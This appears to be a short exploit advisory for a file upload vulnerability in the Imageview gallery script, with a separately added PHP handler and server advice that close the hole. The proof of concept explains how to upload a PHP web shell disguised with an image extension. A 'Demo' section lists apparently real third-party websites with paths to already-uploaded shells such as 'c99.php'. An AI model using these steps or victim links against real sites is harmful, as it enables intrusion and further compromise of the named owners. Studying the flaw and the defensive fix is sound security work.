[+] Author: TUNISIAN CYBER
[+] Exploit Title: Imageview File Upload vulnerability
[+] Date: 20-01-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: Kali Linux
[+] Friendly Sites: na3il.com,th3-creative.com
#############################################################
+Exploit:
Imageview suffers from a file upload vulnerability that allows an attacker
to upload a PHP file.
+P.O.C:
127.0.0.1/[PATH]/upload.php
Upload as shell.php.[img extension jpg png gif]
Change it using Tamper Data
Shell Path:
127.0.0.1/[PATH]/albums/shell.php
+Demo:
http://indianayouthballet.com/photos/upload.php
http://indianayouthballet.com/photos/albums/a0a0a.php
http://www.schaefer-swantow.de/Galerie/upload.php
http://www.schaefer-swantow.de/Galerie/albums/c99.php
http://www.rappel-zappel.de/galerie/upload.php
+Fix:
There's no fix from the script's owner, but you can change the name or path of "upload.php".
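A server-side check that closes the hole described above, as an added example (not Imageview's code and not from the advisory's author). The form field name "image", the "albums" directory location and the size limit are assumptions. The handler decides the file type from its content and generates the stored name itself, so the uploaded name never reaches the disk.

```php
<?php
// Added example, not Imageview code. Assumed names: form field "image",
// storage directory "albums" next to this script.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 5 * 1024 * 1024; // assumed size limit

function store_uploaded_image(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }

    // Type comes from the file content. The client-supplied name and
    // Content-Type can be rewritten in transit and are ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED_TYPES[$mime] ?? null) : null;
    if ($ext === null || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not an accepted image');
    }

    // Server-generated name plus allowlisted extension: neither
    // "shell.php.jpg" nor a renamed "shell.php" decides the stored name.
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($target, 0644);
    return $name;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['image'])) {
    try {
        $stored = store_uploaded_image($_FILES['image'], __DIR__ . '/albums');
        echo 'Stored as ', htmlspecialchars($stored);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Rejected: ', htmlspecialchars($e->getMessage());
    }
}
```

Configuring the web server so that nothing inside the albums directory is executed as a script adds a second layer in case a file still lands there with an unexpected name.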